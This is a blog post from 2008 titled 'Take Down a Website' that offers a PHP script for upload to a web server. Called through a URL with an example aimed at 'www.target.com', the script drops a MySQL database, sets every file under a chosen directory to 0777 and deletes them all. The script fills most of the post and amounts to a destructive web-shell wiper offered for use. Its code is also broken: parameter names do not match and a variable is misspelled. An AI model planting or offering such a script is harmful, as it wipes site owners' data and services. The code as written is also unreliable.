Take Down a Website | codecutters

Welcome to codecutters.info!

Codecutters is a daily updated blog covering our own applications, software reviews, news and information related to technology, and some video tutorials everything related to computers. Please feel free to use the contact form to send us tips and inquiries. Leave some comments on our posts so that we could visit your site and comment you back.

May

Take Down a Website

Posted (aivan monceller) in Tutorials on May-23-2008

NOTE: This script shall collapse your database and file system in seconds.

How does it work?
It will DROP the database specified. After dropping the database, all files in the root directory specified will be unmasked to chmod(0777) this is a unix command to set file permissions to read,write and execute file. Having the permissions, all files will be deleted leaving no trace.

How to use?
1. Upload file to your website save it as “filename.php” (you can place it anywhere)
2. To run the script, here is an example.
http://www.target.com/filenam.php?uname=admin&pwd=god&host=localhost&r oot=target.com/&dbase=users
All files deleted will be listed.

NOTE: Do not hardcode the variable passed to the PHP script, this could be accidentally executed by indexing bots.

<?php
$host = $HTTP_GET_VARS["host"];
$username = $HTTP_GET_VARS["uname"];
$password = $HTTP_GET_VARS["password"];
$root = $HTTP_GET_VARS["dir"];
$conn = mysql_connect($host, $username, $passowrd);
$destroy = $HTTP_GET_VARS["dbase"];

if (!$conn)
{
  echo"Unable to connect to DB: ".mysql_error();
  exit;
}

if (!mysql_select_db($destroy))
{
  echo"Unable to select mydbname: ".mysql_error();
  exit;
}
else
{
  recursiveChmod($root, 0777, 0777);
  deleteeverything($root);
}

$sql = "DROP DATABASE ".$destroy;
$result = mysql_query($sql);

function deleteeverything($dir)
{
  if ($handle = opendir($dir))
  {
    while (false !== ($file = readdir($handle)))
    {
      if ($file != '.' && $file != '..' && is_file($dir.'/'.$file))
      {
        if (unlink($dir.'/'.$file))
        {
          echo $dir.'/'.$file.' (file) deleted<br />';
        }
        else
        {
          echo $dir.'/'.$file.' (file) NOT deleted!<br />';
        }
      }
      else if ($file != '.' && $file != '..' && is_dir($dir.'/'.$file))
      {
        deleteeverything($dir.'/'.$file);
        if (rmdir($dir.'/'.$file))
        {
          echo $dir.'/'.$file.' (directory) deleted<br />';
        }
        else
        {
          echo $dir.'/'.$file.' (directory) NOT deleted!<br />';
        }
      }
    }
    closedir($handle);
  }

}

  function recursiveChmod($path, $filePerm = 0644, $dirPerm = 0755){
  if (!file_exists($path))
    return (FALSE);
  if (is_file($path))
    chmod($path, $filePerm);
  elseif (is_dir($path))
  {
      $foldersAndFiles = scandir($path);
      $entries = array_slice($foldersAndFiles, 2);
      foreach($entries as $entry)
         recursiveChmod($path."/".$entry, $filePerm, $dirPerm);
      chmod($path, $dirPerm);
  return (TRUE);

 }
}

?>

Geocine

Recent Posts

Categories

Archives

Top Browsers

Top OS

Visitors Online

Favorites

Blogosphere

Comments

Meta